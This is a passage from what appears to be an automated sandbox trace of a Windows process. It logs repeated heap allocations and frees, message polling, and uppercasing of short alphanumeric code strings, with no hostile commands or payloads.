| out: hHeap=0x2af0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5974) returned 0x2a8a138 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0050 | out: hHeap=0x2af0000) returned 1 [0122.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0122.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0122.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5974) returned 0x37d0050 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d0050 | out: hHeap=0x2af0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0122.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0122.922] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5974) returned 0x37d0050 [0122.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0122.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0122.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ab8 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0122.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0d8 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0122.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0122.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5974) returned 0x2a8fab8 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0122.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0122.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0122.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0122.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0122.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0122.925] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0122.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0122.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0122.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0122.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0122.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0122.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.926] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0122.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0122.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0122.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0122.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0122.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0122.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0122.927] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0122.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0122.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0122.928] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0122.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa030 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0122.928] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0122.929] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0122.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0122.929] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0122.929] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0122.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa270 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74748 [0122.929] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 